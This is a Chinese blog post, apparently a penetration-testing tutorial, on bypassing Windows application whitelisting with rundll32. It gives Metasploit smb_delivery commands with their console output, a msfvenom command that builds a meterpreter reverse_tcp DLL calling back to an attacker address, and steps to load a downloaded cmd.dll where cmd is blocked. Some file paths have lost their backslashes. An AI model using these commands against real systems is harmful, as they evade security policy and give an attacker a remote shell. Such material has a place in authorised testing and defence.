zoukankan      html  css  js  c++  java
  • 白名单执行payload之rundll32

    简介

    出于安全原因,系统管理员将添加组策略以实现限制本地用户的应用程序执行,此处将通过rundll32来实现绕过相关安全策略
    
    dll(动态链接库)文件对于windows系统非常重要,决定了自定义windows的其他程序的运行,向其他程序提供有关如何调用某些内容的指令,因此多个软件甚至能够共享这样的dll。经过与exe文件格式相同,但无法直接运行,dll文件扩展名可以是dll(动态链接库)、ocx(ActiveX控件)、cpl(控制面板)、drv(设备驱动程序)
    

    实际使用

    smb_delivery

    攻击机如下使用即可
    msf5 exploit(windows/smb/smb_delivery) > use exploit/windows/smb/smb_delivery 
    msf5 exploit(windows/smb/smb_delivery) > set srvhost 192.168.3.130
    srvhost => 192.168.3.130
    msf5 exploit(windows/smb/smb_delivery) > run
    [*] Exploit running as background job 0.
    [*] Exploit completed, but no session was created.
    
    [*] Started reverse TCP handler on 192.168.3.130:4444 
    msf5 exploit(windows/smb/smb_delivery) > [*] Started service listener on 192.168.3.130:445 
    [*] Server started.
    [*] Run the following command on the target machine:
    rundll32.exe \192.168.3.130qily	est.dll,0
    

    目标机执行
    rundll32.exe \192.168.3.130qily	est.dll,0
    

    确认获得session如下
    

    msfvenom

    生成dll
    msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.122.1 lport=13637 -f dll > 13637.dll
    

    再用rundll32运行即可 rundll32 shell32.dll,Control_RunDLL  C:UsersAdministratorDesktop13637.dll
    

    特殊情况

    遇到目标主机阻止相关程序运行,类似如下图所示
    

    通过下载该文件运行即可:
    http://didierstevens.com/files/software/cmd-dll_v0_0_4.zip
    rundll32 shell32.dll,Control_RunDLL C:UsersAdministratorDesktopcmd-dll_v0_0_4cmd.dll
    

    最终效果如下
    

    联系邮箱:yang_s1r@163.com 博客园地址:https://www.cnblogs.com/Yang34/
  • 相关阅读:
    丑数系列
    452. 用最少数量的箭引爆气球
    406. 根据身高重建队列
    763. 划分字母区间
    所有二叉树题目记录
    二叉树前中后序遍历非递归(迭代)解法
    二叉树的层序遍历题目汇总
    442. 数组中重复的数据&&448. 找到所有数组中消失的数字
    225. 用队列实现栈(Easy)
    使用ClosedXML读写excel
  • 原文地址:https://www.cnblogs.com/Yang34/p/14404207.html
Copyright © 2011-2022 走看看